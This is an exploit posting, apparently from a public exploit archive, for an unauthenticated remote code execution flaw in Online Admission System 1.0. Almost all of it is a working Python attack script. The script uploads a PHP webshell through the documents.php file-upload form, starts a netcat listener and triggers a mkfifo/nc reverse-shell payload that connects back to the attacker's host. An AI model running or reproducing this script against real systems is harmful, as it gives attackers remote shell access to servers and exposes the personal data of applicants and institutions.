Online Admission System 1.0 Remote Code Execution

Online Admission System version 1.0 suffers from an unauthenticated remote code execution vulnerability.


MD5 | 067dc9917f063d76545f476f72a30c18

# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 23/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System
# Software Link: https://github.com/rskoolrash/Online-Admission-System
# Tested on: LAMP Stack (Debian 10)

#!/usr/bin/python
import sys
import re
import argparse
import requests
import time
import subprocess

print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')

path = '/' #change me if the path to the /oas is in the root directory or another subdir

class Exploit:

def __init__(self, target_ip, target_port, localhost, localport):
self.target_ip = target_ip
self.target_port = target_port
self.localhost = localhost
self.localport = localport

def exploitation(self):
payload = """<?php system($_GET['cmd']); ?>"""
payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""

url = 'http://' + target_ip + ':' + target_port + path
r = requests.Session()

print('[*] Resolving URL...')
r1 = r.get(url + 'documents.php')
time.sleep(3)

#Upload the payload file
print('[*] Uploading the webshell payload...')
files = {
'fpic': ('cmd.php', payload + '\n', 'application/x-php'),
'ftndoc': ('', '', 'application/octet-stream'),
'ftcdoc': ('', '', 'application/octet-stream'),
'fdmdoc': ('', '', 'application/octet-stream'),
'ftcdoc': ('', '', 'application/octet-stream'),
'fdcdoc': ('', '', 'application/octet-stream'),
'fide': ('', '', 'application/octet-stream'),
'fsig': ('', '', 'application/octet-stream'),
}
data = {'fpicup':'Submit Query'}
r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)
time.sleep(3)

print('[*] Setting up netcat listener...')
listener = subprocess.Popen(["nc", "-nvlp", self.localport])
time.sleep(3)

print('[*] Spawning reverse shell...')
print('[*] Watchout!')
r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)
time.sleep(3)

if (r3.status_code == 200):
print('[*] Got shell!')
while True:
listener.wait()
else:
print('[-] Something went wrong!')
listener.terminate()

def get_args():
parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
args = parser.parse_args()
return args

args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport

exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()


Related Posts